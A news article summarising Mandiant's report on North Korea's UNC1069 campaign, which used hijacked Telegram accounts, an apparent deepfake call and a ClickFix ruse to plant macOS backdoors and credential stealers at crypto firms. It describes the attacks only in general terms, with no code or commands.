**North Korean Hackers Use Deepfake Video Calls to Target Crypto Firms**
In a shocking revelation, Google Cloud's Mandiant Threat Intelligence has exposed a sophisticated hacking campaign by North Korea's financially motivated threat group, UNC1069. The attacks combine social engineering, deepfakes, and MacOS malware to target financial technology and cryptocurrency firms with the ultimate goal of stealing cryptocurrency.
**A Hijacked Telegram Profile Sets Off the Attack**
The campaign begins with a hijacked Telegram profile of a cryptocurrency executive who had previously fallen victim to account compromise. The attacker uses this compromised account to send messages to others in the fintech sector, building trust and rapport through what appears to be legitimate communication. Once trust is established, the attacker sends a calendar invite to join a meeting, which seems innocuous enough.
**But There's More to it Than Meets the Eye**
However, this meeting is not what it claims to be. According to Mandiant, one target reported that after joining the call, they were confronted with a deepfake of the cryptocurrency executive. Although researchers have been unable to verify this claim, AI-assisted social engineering scams are a known issue in the cybersecurity world.
**The ClickFix Ruse**
Once the victim joins the meeting, the attacker claims that there's an audio issue and offers to help resolve it. This is where the ClickFix attack comes into play – a technique used by attackers to trick victims into running commands on their machine, which ultimately provides the attackers with access and the ability to run code.
**Access Granted**
With the victim's trust gained, the attacker drops malicious files onto the device, including Waveshaper and Hypercall, two backdoors that allow further control over the system. They then install information stealer malware and a data miner – Deepbreath and CHROMEPUSH – to gain even more control and persistence.
**A Treasure Trove of Credentials**
These malicious tools grant access to:
* Login credentials from Keychain * Browser data from Chrome, Brave, and Edge * User data from two different versions of Telegram * User data from Apple Notes
The attackers now have all the login credentials and passwords they need to gain access to the victims' accounts – either to steal from them or use these accounts for additional social engineering.
**Mandiant's Verdict**
"The volume of tooling deployed on a single host indicates a highly determined effort to harvest credentials, browser data, and session tokens to facilitate financial theft," said Mandiant. "This incident was a targeted attack to harvest as much data as possible for a dual purpose; enabling cryptocurrency theft and fuelling future social engineering campaigns by leveraging victim's identity and data."
**A History of Significant Attacks**
State-backed North Korean threat groups have a history of significant cryptocurrency heists and attacks targeting organizations in financial technology. In 2025 alone, North Korea made over $2 billion from attacks targeting cryptocurrency and accounts for over 60% of all cryptocurrency stolen during last year.
As the world becomes increasingly digital, it's clear that cybersecurity threats will only continue to evolve and intensify. The sophistication of these North Korean attacks serves as a stark reminder of the importance of robust security measures in today's digital landscape.